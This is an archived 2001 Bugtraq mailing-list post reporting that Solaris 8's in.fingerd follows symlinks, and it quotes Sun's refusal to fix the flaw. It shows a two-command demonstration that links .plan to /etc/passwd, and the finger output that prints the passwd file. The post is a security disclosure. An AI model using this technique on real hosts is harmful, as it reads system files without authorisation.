Home page logo
/

bugtraq logo Bugtraq mailing list archives

in.fingerd follows sym-links on Solaris 8
From: Lukasz Luzar <lluzar () developers of pl>
Date: Thu, 24 May 2001 18:14:59 +0200 (CEST)

Hello,

 Solaris 8 is still vulnerable to the old bug in in.fingerd daemon.

 lluzar () sun:~ (101) > ln -s /etc/passwd .plan
 lluzar () sun:~ (102) > finger -l lluzar () sun developers of pl
 [localhost]
 Login name: lluzar             In real life: Lukasz Luzar
 Directory: /home/lluzar        Shell: /bin/tcsh
 On since May 19 20:17:04 on pts/70 from unix.developers.of.pl
 Mail last read Sat May 19 13:51:12 2001
 Plan:
 root:x:0:1:Super-User:/root:/sbin/sh
 daemon:x:1:1::/:
 bin:x:2:2::/usr/bin:
 sys:x:3:3::/:
 .
 .

 I believe it could be dangeours in some cases, but people from
 Sun says that they won't repair the in.fingerd because:

 "There are may be legitimate reasons for finger to follow symlinks. If
 finger is considered a security issue, it can be disabled. (..)"

 What do you think ?

Cheers,

--
Lukasz Luzar
http://Developers.of.PL/
Crede quod habes, et habes






  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]